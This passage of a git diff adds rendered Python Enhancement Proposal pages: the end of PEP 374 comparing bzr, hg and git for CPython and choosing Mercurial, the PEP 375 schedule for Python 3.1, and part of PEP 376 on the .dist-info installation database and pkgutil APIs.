+git commit -a -m "Completed fix of socket."
+# Restore the in-progress work on urllib.
+git stash apply
+# Edit me some more code, commit some more fixes.
+git commit -a -m "Complete urllib fixes."
+# And push both patches to the public repository.
+git push
+
+
+

Bonus points: suppose you took your time, and someone else fixed socket in the same way you just did and landed that in the trunk. In that case, your push will fail because your branch is not up to date. If the fix was a one-liner, there’s a very good chance that it’s exactly the same, character for character. git would notice that, and you are done; git will silently merge them.

+

Suppose we’re not so lucky:

+
# Update your branch.
+git pull git://code.python.org/public/trunk master
+
+# git has fetched all the necessary data, but reports that the
+# merge failed.  We discover the nearly-duplicated patch.
+# Neither our version of the master branch nor the workspace has
+# been touched.  Revert our socket patch and pull again:
+git revert HEAD^
+git pull git://code.python.org/public/trunk master
+
+
+

Like Bazaar and Mercurial, git has extensions to manage stacks of +patches. You can use the original Quilt by Andrew Morton, or there is +StGit (“stacked git”) which integrates patch-tracking for large sets +of patches into the VCS in a way similar to Mercurial Queues or Bazaar +looms.
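As a rough illustration of the StGit approach (a sketch; the patch names are hypothetical):

stg init                # start tracking a patch stack on this branch
stg new fix-socket      # create the first patch
# edit socket code
stg refresh             # record the edits into the current patch
stg new fix-urllib      # stack a second, dependent patch on top
# edit urllib code
stg refresh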

+
+
+
+

Doing a Python Release

+

How does PEP 101 change when using a DVCS?

+
+

bzr

+

It will change, but not substantially so. When doing the maintenance branch, we’ll just push to the new location instead of doing an svn cp. Tags are totally different, since in svn they are directory copies, but in bzr (and I’m guessing hg), they are just symbolic names for revisions on a particular branch. The release.py script will have to change to use bzr commands instead. It’s possible that, because DVCSs (in particular, bzr) do cherry picking and merging well enough, we’ll be able to create the maintenance branches sooner. It would be a useful exercise to try to do a release off the bzr/hg mirrors.

+
+
+

hg

+

Clearly, details specific to Subversion in PEP 101 and in the release script will need to be updated. In particular, the release tagging and maintenance branch creation processes will have to be modified to use Mercurial’s features; this will simplify and streamline certain aspects of the release process. For example, tagging and re-tagging a release will become a trivial operation, since a tag, in Mercurial, is simply a symbolic name for a given revision.
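For example, a sketch of how trivial tagging and re-tagging become (the version string is hypothetical):

# tag the release
hg tag v3.1
# a late fix lands; just move the tag
hg tag -f v3.1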

+
+
+

git

+

It will change, but not substantially so. When doing the +maintenance branch, we’ll just git push to the new location instead +of doing an svn cp. Tags are totally different, since in svn they +are directory copies, but in git they are just symbolic names for +revisions, as are branches. (The difference between a tag and a +branch is that tags refer to a particular commit, and will never +change unless you use git tag -f to force them to move. The +checked-out branch, on the other hand, is automatically updated by +git commit.) The release.py script will have to change to use git +commands instead. With git I would create a (local) maintenance +branch as soon as the release engineer is chosen. Then I’d “git +pull” until I didn’t like a patch, when it would be “git pull; git +revert ugly-patch”, until it started to look like the sensible thing +is to fork off, and start doing “git cherry-pick” on the good +patches.

+
+
+
+
+

Platform/Tool Support

+
+

Operating Systems

+ + + + + + + + + + + + + + + + + + + + + + + + + +
DVCS | Windows | OS X | UNIX
bzr | yes (installer) w/ tortoise | yes (installer, fink or MacPorts) | yes (various package formats)
hg | yes (third-party installer) w/ tortoise | yes (third-party installer, fink or MacPorts) | yes (various package formats)
git | yes (third-party installer) | yes (third-party installer, fink or MacPorts) | yes (.deb or .rpm)
+

As the above table shows, all three DVCSs are available on all three major OS platforms. But it also shows that Bazaar is the only DVCS that directly supports Windows with a binary installer, while Mercurial and git require you to rely on a third party for binaries. Both bzr and hg have a Tortoise version while git does not.

+

Bazaar and Mercurial also have the benefit of being available in pure Python, with optional extensions available for performance.

+
+
+

CRLF -> LF Support

+
+
bzr
My understanding is that support for this is being worked on as +I type, landing in a version RSN. I will try to dig up details.
+
hg
Supported via the win32text extension.
+
git
I can’t say from personal experience, but it looks like there’s +pretty good support via the core.autocrlf and core.safecrlf +configuration attributes.
+
+
+
+

Case-insensitive filesystem support

+
+
bzr
Should be OK. I share branches between Linux and OS X all the +time. I’ve done case changes (e.g. bzr mv Mailman mailman) and +as long as I did it on Linux (obviously), when I pulled in the +changes on OS X everything was hunky dory.
+
hg
Mercurial uses a case-safe repository mechanism and detects case-folding collisions.
+
git
Since OS X preserves case, you can do case changes there too. git does not have a problem with renames in either direction. However, case-insensitive filesystem support is usually taken to mean complaining about collisions on case-sensitive file systems. git does not do that.
+
+
+
+

Tools

+

In terms of code review tools such as Review Board and Rietveld, +the former supports all three while the latter supports hg and git but +not bzr. Bazaar does not yet have an online review board, but it +has several ways to manage email based reviews and trunk merging. +There’s Bundle Buggy, Patch Queue Manager (PQM), and +Launchpad’s code reviews.

+

All three have web sites that provide basic hosting support for people who want to put a repository online. Bazaar has Launchpad, Mercurial has bitbucket.org, and git has GitHub. Google Code also has instructions on how to use git with the service, both to hold a repository and to act as a read-only mirror.

+

All three also appear to be supported +by Buildbot.

+
+
+
+

Usage On Top Of Subversion

+ + + + + + + + + + + + + + + + + +
DVCS | svn support
bzr | bzr-svn (third-party)
hg | multiple third-parties
git | git-svn
+

All three DVCSs have svn support, although git is the only one to +come with that support out-of-the-box.

+
+
+

Server Support

+ + + + + + + + + + + + + + + + + +
DVCS | Web page interface
bzr | loggerhead
hg | hgweb
git | gitweb
+

All three DVCSs support various hooks on the client and server side +for e.g. pre/post-commit verifications.

+
+
+

Development

+

All three projects are under active development. Git seems to be on a monthly release schedule. Bazaar is on a time-based monthly schedule. Mercurial is on a four-month, timed release schedule.

+
+
+

Special Features

+
+

bzr

+

Martin Pool adds: “bzr has a stable Python scripting interface, with +a distinction between public and private interfaces and a +deprecation window for APIs that are changing. Some plugins are +listed in https://edge.launchpad.net/bazaar and +http://bazaar-vcs.org/Documentation”.

+
+
+

hg

+

Alexander Solovyov comments:

+
+
Mercurial has an easy-to-use, extensive API with hooks for the main events and the ability to extend commands. Also there is the mq (Mercurial Queues) extension, distributed with Mercurial, which simplifies working with patches.
+
+
+

git

+

git has a cvsserver mode, i.e., you can check out a tree from git using CVS. You can even commit to the tree, but features like merging are absent, and branches are handled as CVS modules, which is likely to shock a veteran CVS user.
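A sketch of what this looks like from the CVS side, following the git-cvsserver documentation (the host and path are hypothetical):

export CVS_SERVER="git cvsserver"
cvs -d :ext:me@code.python.org/python/trunk.git co -d trunk master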

+
+
+
+

Tests/Impressions

+

As I (Brett Cannon) am left with the task of making the final decision of which/any DVCS to go with, and not my co-authors, I felt it only fair to write down what tests I ran and my impressions as I evaluated the various tools, so as to be as transparent as possible.

+
+

Barrier to Entry

+

The amount of time and effort it takes to get a checkout of Python’s +repository is critical. If the difficulty or time is too great then a +person wishing to contribute to Python may very well give up. That +cannot be allowed to happen.

+

I measured checking out the 2.x trunk as if I were a non-core developer. Timings were done using the time command in zsh, and space was calculated with du -c -h.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
DVCS | San Francisco | Vancouver | Space
svn | 1:04 | 2:59 | 139 M
bzr | 10:45 | 16:04 | 276 M
hg | 2:30 | 5:24 | 171 M
git | 2:54 | 5:28 | 134 M
+

When comparing these numbers to svn, it is important to realize that it is not a 1:1 comparison. Svn does not pull down the entire revision history like all of the DVCSs do. That means svn can perform an initial checkout much faster than the DVCSs, purely based on the fact that it has less information to download from the network.

+
+
+

Performance of basic information functionality

+

To see how the tools did for performing a command that required +querying the history, the log for the README file was timed.

+ + + + + + + + + + + + + + + + + +
DVCS | Time
bzr | 4.5 s
hg | 1.1 s
git | 1.5 s
+

One thing of note during this test was that it took longer with git than with the other tools to figure out how to get the log without it using a pager. While the pager is a nice touch in general, working out how to keep it from turning on automatically took some time (it turns out the main git command has a --no-pager flag to disable use of the pager).

+
+
+

Figuring out what command to use from built-in help

+

I ended up trying to find out what the command was to see what URL the +repository was cloned from. To do this I used nothing more than the +help provided by the tool itself or its man pages.

+

Bzr was the easiest: bzr info. Running bzr help didn’t show +what I wanted, but mentioned bzr help commands. That list had the +command with a description that made sense.

+

Git was the second easiest. The command git help didn’t show much and did not have a way of listing all commands. That is when I viewed the man page. Reading through the various commands, I discovered git remote. The command itself spit out nothing more than origin. Trying git remote origin produced an error and printed out the command usage. That is when I noticed git remote show. Running git remote show origin gave me the information I wanted.

+

For hg, I never found the information I wanted on my own. It turns out I wanted hg paths, but that was not obvious from the description of “show definition of symbolic path names” as printed by hg help (it should be noted that reporting this in the PEP did lead the Mercurial developers to clarify the wording to make the use of the hg paths command clearer).
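For reference, a sketch of the command and its output after cloning (the URL is taken from the mirror table above):

$ hg paths
default = http://code.python.org/hg/trunk/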

+
+
+

Updating a checkout

+

To see how long it takes to update an outdated repository, I timed updating both a repository 700 commits behind and one 50 commits behind (three weeks stale and one week stale, respectively).

+ + + + + + + + + + + + + + + + + + + + + +
DVCS | 700 commits | 50 commits
bzr | 39 s | 7 s
hg | 17 s | 3 s
git | N/A | 4 s
+
+

Note

+

Git lacks a value for the 700 commits scenario as it does +not seem to allow checking out a repository at a specific +revision.

+
+

Git deserves special mention for its output from git pull. It +not only lists the delta change information for each file but also +color-codes the information.

+
+
+
+

Decision

+

At PyCon 2009 the decision was made to go with Mercurial.

+
+

Why Mercurial over Subversion

+

While svn has served the development team well, it must be admitted that svn does not serve the needs of non-committers as well as a DVCS does. Because svn only provides its features, such as version control and branching, to people with commit privileges on the repository, it can be a hindrance for people who lack commit privileges. DVCSs have no such limitation, as anyone can create a local branch of Python and perform their own local commits without the burden that comes with cloning the entire svn repository. Allowing anyone to have the same workflow as the core developers was the key reason to switch from svn to hg.

+

Orthogonal to the benefits of allowing anyone to easily commit locally to their own branches are offline, fast operations. Because hg stores all data locally, there is no need to send requests to a remote server; work happens off of the local disk instead. This improves response times tremendously. It also allows for offline usage when one lacks an Internet connection. But this benefit is minor and considered simply a side-effect benefit instead of a driving factor for switching off of Subversion.

+
+
+

Why Mercurial over other DVCSs

+

Git was not chosen for three key reasons (see the PyCon 2009 lightning talk where Brett Cannon lists these exact reasons; the talk starts at 3:45). First, git’s Windows support is the weakest of the three DVCSs being considered, which is unacceptable, as Python needs to support development on any platform it runs on. Since Python runs on Windows and some people do develop on the platform, it needs solid support. And while git’s support is improving, as of this moment it is the weakest by a large enough margin to warrant considering it a problem.

+

Second, and just as important as the first issue, is that the Python core developers liked git the least of the three DVCS options by a wide margin. The following table shows the results of a survey taken of the core developers; by a large margin, git is the least favorite version control system.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
DVCS | ++ | equal | -- | Uninformed
git | 5 | 1 | 8 | 13
bzr | 10 | 3 | 2 | 12
hg | 15 | 1 | 1 | 10
+

Lastly, all things being equal (which they are not, as shown by the previous two issues), it is preferable to use and support a tool written in Python and not one written in C and shell. We are pragmatic enough not to choose a tool simply because it is written in Python, but we do see the usefulness in promoting tools that do use it when it is reasonable to do so, as it is in this case.

+

As for why Mercurial was chosen over Bazaar, it came down to popularity. As the core developer survey shows, hg was preferred over bzr. The community also appears to prefer hg, as was shown at PyCon after git’s removal from consideration was announced. Many people came up to Brett and said in various ways that they wanted hg to be chosen. While no one said they did not want bzr chosen, no one said they did, either.

+

Based on all of this information, Guido and Brett decided Mercurial +was to be the next version control system for Python.

+
+
+
+

Transition Plan

+

PEP 385 outlines the transition from svn to hg.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0374.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0375/index.html b/pep-0375/index.html new file mode 100644 index 00000000000..a643be95c93 --- /dev/null +++ b/pep-0375/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 375 – Python 3.1 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 375 – Python 3.1 Release Schedule

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
08-Feb-2009
+
Python-Version:
+
3.1
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for Python 3.1. +The schedule primarily concerns itself with PEP-sized items. Small features may +be added up to and including the first beta release. Bugs may be fixed until +the final release.

+
+
+

Release Manager and Crew

+ + + + + + + + + + + + + + + + + +
Position | Name
3.1 Release Manager | Benjamin Peterson
Windows installers | Martin v. Loewis
Mac installers | Ronald Oussoren
+
+
+

Release Schedule

+
    +
  • 3.1a1 March 7, 2009
  • +
  • 3.1a2 April 4, 2009
  • +
  • 3.1b1 May 6, 2009
  • +
  • 3.1rc1 May 30, 2009
  • +
  • 3.1rc2 June 13, 2009
  • +
  • 3.1 final June 27, 2009
  • +
+
+
+

Maintenance Releases

+

3.1 is no longer maintained. 3.1 received security fixes until June +2012.

+

Previous maintenance releases are:

+
    +
  • v3.1.1rc1 2009-08-13
  • +
  • v3.1.1 2009-08-16
  • +
  • v3.1.2rc1 2010-03-06
  • +
  • v3.1.2 2010-03-20
  • +
  • v3.1.3rc1 2010-11-13
  • +
  • v3.1.3 2010-11-27
  • +
  • v3.1.4rc1 2011-05-29
  • +
  • v3.1.4 2011-06-11
  • +
  • v3.1.5rc1 2012-02-23
  • +
  • v3.1.5rc2 2012-03-15
  • +
  • v3.1.5 2012-04-06
  • +
+
+
+

Features for 3.1

+
    +
  • importlib
  • +
  • io in C
  • +
  • Update simplejson to the latest external version [1].
  • +
  • Ordered dictionary for collections (PEP 372).
  • +
  • auto-numbered replacement fields in str.format() strings [2]
  • +
  • Nested with-statements in one with statement
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0375.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0376/index.html b/pep-0376/index.html new file mode 100644 index 00000000000..8c1387b8ac6 --- /dev/null +++ b/pep-0376/index.html @@ -0,0 +1,721 @@ + + + + + + + + PEP 376 – Database of Installed Python Distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 376 – Database of Installed Python Distributions

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
22-Feb-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+
22-Jun-2009
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

The goal of this PEP is to provide a standard infrastructure to manage +project distributions installed on a system, so all tools that are +installing or removing projects are interoperable.

+

To achieve this goal, the PEP proposes a new format to describe installed +distributions on a system. It also describes a reference implementation +for the standard library.

+

In the past an attempt was made to create an installation database +(see PEP 262).

+

Combined with PEP 345, the current proposal supersedes PEP 262.

+

Note: the implementation plan didn’t go as expected, so it should be +considered informative only for this PEP.

+
+
+

Rationale

+

There are two problems right now in the way distributions are installed in +Python:

+
    +
  • There are too many ways to do it and this makes interoperation difficult.
  • +
  • There is no API to get information on installed distributions.
  • +
+
+

How distributions are installed

+

Right now, when a distribution is installed in Python, every element can +be installed in a different directory.

+

For instance, Distutils installs the pure Python code in the purelib +directory, which is lib/python2.6/site-packages for unix-like systems and +Mac OS X, or Lib\site-packages under Python’s installation directory for +Windows.

+

Additionally, the install_egg_info subcommand of the Distutils install +command adds an .egg-info file for the project into the purelib +directory.

+

For example, for the docutils distribution, which contains one package, an extra module, and executable scripts, three elements are installed in site-packages:

+
    +
  • docutils: The docutils package.
  • +
  • roman.py: An extra module used by docutils.
  • +
  • docutils-0.5-py2.6.egg-info: A file containing the distribution metadata +as described in PEP 314. This file corresponds to the file +called PKG-INFO, built by the sdist command.
  • +
+

Some executable scripts, such as rst2html.py, are also added in the +bin directory of the Python installation.

+

Another project called setuptools [1] has two other formats +to install distributions, called EggFormats [4]:

+
    +
  • a self-contained .egg directory, that contains all the distribution files +and the distribution metadata in a file called PKG-INFO in a subdirectory +called EGG-INFO. setuptools creates other files in that directory that can +be considered as complementary metadata.
  • +
  • an .egg-info directory installed in site-packages, that contains the same +files EGG-INFO has in the .egg format.
  • +
+

The first format is automatically used when you install a distribution that +uses the setuptools.setup function in its setup.py file, instead of +the distutils.core.setup one.

+

setuptools also adds a reference to the distribution into an easy-install.pth file.

+

Last, the setuptools project provides an executable script called +easy_install [2] that installs all distributions, including +distutils-based ones in self-contained .egg directories.

+

If you want to have standalone .egg-info directories for your distributions, +e.g. the second setuptools format, you have to force it when you work +with a setuptools-based distribution or with the easy_install script. +You can force it by using the --single-version-externally-managed option +or the --root option. This will make the setuptools project install +the project like distutils does.

+

This option is used by:

+
    +
  • the pip [3] installer
  • +
  • the Fedora packagers [5].
  • +
  • the Debian packagers [6].
  • +
+
+
+

Uninstall information

+

Distutils doesn’t provide an uninstall command. If you want to uninstall +a distribution, you have to be a power user and remove the various elements +that were installed, and then look over the .pth file to clean them if +necessary.

+

And the process differs depending on the tools you have used to install the distribution and on whether the distribution’s setup.py uses Distutils or Setuptools.

+

Under some circumstances, you might not be able to know for sure that you +have removed everything, or that you didn’t break another distribution by +removing a file that is shared among several distributions.

+

But there’s a common behavior: when you install a distribution, files are +copied in your system. And it’s possible to keep track of these files for +later removal.

+

Moreover, the Pip project has gained an uninstall feature lately. It +records all installed files, using the record option of the install +command.

+
+
+

What this PEP proposes

+

To address those issues, this PEP proposes a few changes:

+
    +
• A new .dist-info structure using a directory, inspired by one of the formats of the EggFormats standard from setuptools.
  • +
  • New APIs in pkgutil to be able to query the information of installed +distributions.
  • +
  • An uninstall function and an uninstall script in Distutils.
  • +
+
+
+
+

One .dist-info directory per installed distribution

+

This PEP proposes an installation format inspired by one of the options in the +EggFormats standard, the one that uses a distinct directory located in the +site-packages directory.

+

This distinct directory is named as follows:

+
name + '-' + version + '.dist-info'
+
+
+
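For example, version 0.5 of docutils would be installed with a directory named docutils-0.5.dist-info (as in the RECORD example below).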

This .dist-info directory can contain these files:

+
    +
  • METADATA: contains metadata, as described in PEP 345, PEP 314 and PEP 241.
  • +
  • RECORD: records the list of installed files
  • +
  • INSTALLER: records the name of the tool used to install the project
  • +
  • REQUESTED: the presence of this file indicates that the project +installation was explicitly requested (i.e., not installed as a dependency).
  • +
+

The METADATA, RECORD and INSTALLER files are mandatory, while REQUESTED may +be missing.

+

This proposal will not impact Python itself because the metadata files are not +used anywhere yet in the standard library besides Distutils.

+

It will impact the setuptools and pip projects but, given the fact that +they already work with a directory that contains a PKG-INFO file, the change +will have no deep consequences.

+
+

RECORD

+

A RECORD file is added inside the .dist-info directory at installation time when installing a source distribution using the install command. Notice that when installing a binary distribution created with the bdist command or a bdist-based command, the RECORD file will be installed as well, since these commands use the install command to create binary distributions.

+

The RECORD file holds the list of installed files. These correspond +to the files listed by the record option of the install command, and will +be generated by default. This allows the implementation of an uninstallation +feature, as explained later in this PEP. The install command also provides +an option to prevent the RECORD file from being written and this option +should be used when creating system packages.
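The record option this builds on already exists in distutils today; for example (the output file name is arbitrary):

python setup.py install --record installed-files.txt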

+

Third-party installation tools also should not overwrite or delete files +that are not in a RECORD file without prompting or warning.

+

This RECORD file is inspired from PEP 262 FILES.

+

The RECORD file is a CSV file, composed of records, one line per +installed file. The csv module is used to read the file, with +these options:

+
    +
  • field delimiter : ,
  • +
  • quoting char : ".
  • +
  • line terminator : os.linesep (so \r\n or \n)
  • +
+

When a distribution is installed, files can be installed under:

+
    +
  • the base location: path defined by the --install-lib option, +which defaults to the site-packages directory.
  • +
  • the installation prefix: path defined by the --prefix option, which +defaults to sys.prefix.
  • +
  • any other path on the system.
  • +
+

Each record is composed of three elements:

+
    +
  • the file’s path
      +
    • a ‘/’-separated path, relative to the base location, if the file is +under the base location.
    • +
    • a ‘/’-separated path, relative to the base location, if the file +is under the installation prefix AND if the base location is a +subpath of the installation prefix.
    • +
    • an absolute path, using the local platform separator
    • +
    +
  • +
  • a hash of the file’s contents. +Notice that pyc and pyo generated files don’t have any hash because +they are automatically produced from py files. So checking the hash +of the corresponding py file is enough to decide if the file and +its associated pyc or pyo files have changed.

    The hash is either the empty string or the hash algorithm as named in +hashlib.algorithms_guaranteed, followed by the equals character +=, followed by the urlsafe-base64-nopad encoding of the digest +(base64.urlsafe_b64encode(digest) with trailing = removed).

    +
  • +
  • the file’s size in bytes
  • +
+

The csv module is used to generate this file, so the field separator is +“,”. Any “,” character found within a field is escaped automatically by +csv.

+

When the file is read, the U option is used so the universal newline +support (see PEP 278) is activated, avoiding any trouble +reading a file produced on a platform that uses a different new line +terminator.

+

Here’s an example of a RECORD file (extract):

+
lib/python2.6/site-packages/docutils/__init__.py,md5=nWt-Dge1eug4iAgqLS_uWg,9544
+lib/python2.6/site-packages/docutils/__init__.pyc,,
+lib/python2.6/site-packages/docutils/core.py,md5=X90C_JLIcC78PL74iuhPnA,66188
+lib/python2.6/site-packages/docutils/core.pyc,,
+lib/python2.6/site-packages/roman.py,md5=7YhfNczihNjOY0FXlupwBg,234
+lib/python2.6/site-packages/roman.pyc,,
+/usr/local/bin/rst2html.py,md5=g22D3amDLJP-FhBzCi7EvA,234
+/usr/local/bin/rst2html.pyc,,
+python2.6/site-packages/docutils-0.5.dist-info/METADATA,md5=ovJyUNzXdArGfmVyb0onyA,195
+lib/python2.6/site-packages/docutils-0.5.dist-info/RECORD,,
+
+
+

Notice that the RECORD file can’t contain a hash of itself; its own entry is therefore listed with empty hash and size fields, as shown above.

+

A project that installs a config.ini file in /etc/myapp will be added like this:

+
/etc/myapp/config.ini,md5=gLfd6IANquzGLhOkW4Mfgg,9544
+
+
+

For a Windows platform, the drive letter is added for the absolute paths, so a file that is copied into c:\MyApp\ will be:

+
c:\etc\myapp\config.ini,md5=gLfd6IANquzGLhOkW4Mfgg,9544
+
+
+
+
+

INSTALLER

+

The install command has a new option called installer. This option +is the name of the tool used to invoke the installation. It’s a normalized +lower-case string matching [a-z0-9_\-\.].

+
+
$ python setup.py install --installer=pkg-system
+

It defaults to distutils if not provided.

+

When a distribution is installed, the INSTALLER file is generated in the +.dist-info directory with this value, to keep track of who installed the +distribution. The file is a single-line text file.

+
+
+

REQUESTED

+

Some install tools automatically detect unfulfilled dependencies and +install them. In these cases, it is useful to track which +distributions were installed purely as a dependency, so if their +dependent distribution is later uninstalled, the user can be alerted +of the orphaned dependency.

+

If a distribution is installed by direct user request (the usual +case), a file REQUESTED is added to the .dist-info directory of the +installed distribution. The REQUESTED file may be empty, or may +contain a marker comment line beginning with the “#” character.

+

If an install tool installs a distribution automatically, as a +dependency of another distribution, the REQUESTED file should not be +created.

+

The install command of distutils by default creates the REQUESTED +file. It accepts --requested and --no-requested options to explicitly +specify whether the file is created.
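Under this proposal, an install tool resolving a dependency would therefore invoke something like the following (a sketch of the proposed options, not of shipped distutils behavior):

python setup.py install --no-requested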

+

If a distribution that was already installed on the system as a dependency +is later installed by name, the distutils install command will +create the REQUESTED file in the .dist-info directory of the existing +installation.

+
+
+
+

Implementation details

+

Note: this section is non-normative. In the end, this PEP was +implemented by third-party libraries and tools, not the standard +library.

+
+

New functions and classes in pkgutil

+

To use the .dist-info directory content, we need to add a set of APIs to the standard library. The best place to put these APIs is pkgutil.

+
+

Functions

+

The new functions added in the pkgutil module are:

+
    +
  • distinfo_dirname(name, version) -> directory name
    +
    name is converted to a standard distribution name by replacing any +runs of non-alphanumeric characters with a single ‘-‘.

    version is converted to a standard version string. Spaces become +dots, and all other non-alphanumeric characters (except dots) become +dashes, with runs of multiple dashes condensed to a single dash.

    +

    Both attributes are then converted into their filename-escaped form, +i.e. any ‘-’ characters are replaced with ‘_’ other than the one in +‘dist-info’ and the one separating the name from the version number.

    +
    +
  • +
  • get_distributions() -> iterator of Distribution instances.

    Provides an iterator that looks for .dist-info directories in +sys.path and returns Distribution instances for +each one of them.

    +
  • +
• get_distribution(name) -> Distribution or None.

    Scans all elements in sys.path and looks for all directories ending with .dist-info. Returns a Distribution corresponding to the .dist-info directory that contains a METADATA file that matches name for the name metadata. This function only returns the first result found, since no more than one value is expected. If the directory is not found, returns None.
  • +
  • obsoletes_distribution(name, version=None) -> iterator of Distribution +instances.

    Iterates over all distributions to find which distributions obsolete +name. If a version is provided, it will be used to filter the results.

    +
  • +
  • provides_distribution(name, version=None) -> iterator of Distribution +instances.

    Iterates over all distributions to find which distributions provide name. If a version is provided, it will be used to filter the results.

    +


    +
  • +
  • get_file_users(path) -> iterator of Distribution instances.

    Iterates over all distributions to find out which distributions use path. path can be a local absolute path or a relative ‘/’-separated path.

    +

    A local absolute path is an absolute path in which occurrences of ‘/’ +have been replaced by the system separator given by os.sep.

    +
  • +
+
+
+
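As noted above, the distinfo_dirname() normalization rules can be sketched in a few lines; this is an illustration written for this description, not the reference implementation:

import re

def distinfo_dirname(name, version):
    # name: runs of non-alphanumeric characters collapse to a single '-'
    name = re.sub(r'[^A-Za-z0-9]+', '-', name)
    # version: spaces become dots, other non-alphanumerics (except
    # dots) become dashes, and runs of dashes are condensed
    version = version.replace(' ', '.')
    version = re.sub(r'[^A-Za-z0-9.]+', '-', version)
    version = re.sub(r'-+', '-', version)
    # filename escaping: remaining '-' characters become '_'
    return '%s-%s.dist-info' % (name.replace('-', '_'),
                                version.replace('-', '_'))

This reproduces the results shown in the Examples section below, e.g. distinfo_dirname('python-ldap', '2.5 a---5') gives 'python_ldap-2.5.a_5.dist-info'.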

Distribution class

+

A new class called Distribution is created with the path of the +.dist-info directory provided to the constructor. It reads the metadata +contained in METADATA when it is instantiated.

+

Distribution(path) -> instance

+
+
Creates a Distribution instance for the given path.
+

Distribution provides the following attributes:

+
    +
  • name: The name of the distribution.
  • +
  • metadata: A DistributionMetadata instance loaded with the +distribution’s METADATA file.
  • +
  • requested: A boolean that indicates whether the REQUESTED +metadata file is present (in other words, whether the distribution was +installed by user request).
  • +
+

And following methods:

+
    +
  • get_installed_files(local=False) -> iterator of (path, hash, size)

    Iterates over the RECORD entries and returns a tuple (path, hash, size) for each line. If local is True, the path is transformed into a local absolute path. Otherwise the raw value from RECORD is returned.

    +

    A local absolute path is an absolute path in which occurrences of ‘/’ +have been replaced by the system separator given by os.sep.

    +
  • +
  • uses(path) -> Boolean

    Returns True if path is listed in RECORD. path +can be a local absolute path or a relative ‘/’-separated path.

    +
  • +
  • get_distinfo_file(path, binary=False) -> file object
    +
    Returns a file located under the .dist-info directory.

    Returns a file instance for the file pointed to by path.

    +

    path has to be a ‘/’-separated path relative to the .dist-info +directory or an absolute path.

    +

    If path is an absolute path and doesn’t start with the .dist-info +directory path, a DistutilsError is raised.

    +

    If binary is True, opens the file in read-only binary mode (rb), +otherwise opens it in read-only mode (r).

    +
    +
  • +
  • get_distinfo_files(local=False) -> iterator of paths

    Iterates over the RECORD entries and returns the path for each line that points to a file located in the .dist-info directory or one of its subdirectories.

    +

    If local is True, each path is transformed into a +local absolute path. Otherwise the raw value from RECORD is returned.

    +
  • +
+

Notice that the API is organized in five classes that work with directories +and Zip files (so it works with files included in Zip files, see PEP 273 for +more details). These classes are described in the documentation +of the prototype implementation for interested readers [7].

+
+
+

Examples

+

Let’s use some of the new APIs with our docutils example:

+
>>> from pkgutil import get_distribution, get_file_users, distinfo_dirname
+>>> dist = get_distribution('docutils')
+>>> dist.name
+'docutils'
+>>> dist.metadata.version
+'0.5'
+
+>>> distinfo_dirname('docutils', '0.5')
+'docutils-0.5.dist-info'
+
+>>> distinfo_dirname('python-ldap', '2.5')
+'python_ldap-2.5.dist-info'
+
+>>> distinfo_dirname('python-ldap', '2.5 a---5')
+'python_ldap-2.5.a_5.dist-info'
+
+>>> for path, hash, size in dist.get_installed_files():
+...     print '%s %s %d' % (path, hash, size)
+...
+python2.6/site-packages/docutils/__init__.py b690274f621402dda63bf11ba5373bf2 9544
+python2.6/site-packages/docutils/core.py 9c4b84aff68aa55f2e9bf70481b94333 66188
+python2.6/site-packages/roman.py a4b84aff68aa55f2e9bf70481b943D3 234
+/usr/local/bin/rst2html.py a4b84aff68aa55f2e9bf70481b943D3 234
+python2.6/site-packages/docutils-0.5.dist-info/METADATA 6fe57de576d749536082d8e205b77748 195
+python2.6/site-packages/docutils-0.5.dist-info/RECORD
+
+>>> dist.uses('docutils/core.py')
+True
+
+>>> dist.uses('/usr/local/bin/rst2html.py')
+True
+
+>>> dist.get_distinfo_file('METADATA')
+<open file at ...>
+
+>>> dist.requested
+True
+
+
+
+
+
+

New functions in Distutils

+

Distutils already provides a very basic way to install a distribution, which +is running the install command over the setup.py script of the +distribution.

+

Distutils2 will provide a very basic uninstall function, added in distutils2.util, which takes the name of the distribution to uninstall as its argument. uninstall uses the APIs described earlier and removes all unique files, as long as their hash hasn't changed. Then it removes any empty directories left behind.

+

uninstall returns a list of uninstalled files:

+
>>> from distutils2.util import uninstall
+>>> uninstall('docutils')
+['/opt/local/lib/python2.6/site-packages/docutils/core.py',
+ ...
+ '/opt/local/lib/python2.6/site-packages/docutils/__init__.py']
+
+
+

If the distribution is not found, a DistutilsUninstallError is raised.

+
+

Filtering

+

To make it a reference API for third-party projects that wish to control how uninstall works, a second, callable argument can be used. It is called for each file that is about to be removed. If the callable returns True, the file is removed. If it returns False, it's left alone.

+

Examples:

+
>>> def _remove_and_log(path):
+...     logging.info('Removing %s' % path)
+...     return True
+...
+>>> uninstall('docutils', _remove_and_log)
+
+>>> def _dry_run(path):
+...     logging.info('Removing %s (dry run)' % path)
+...     return False
+...
+>>> uninstall('docutils', _dry_run)
+
+
+

Of course, a third-party tool can use lower-level pkgutil APIs to +implement its own uninstall feature.

+
+
+

Installer marker

+

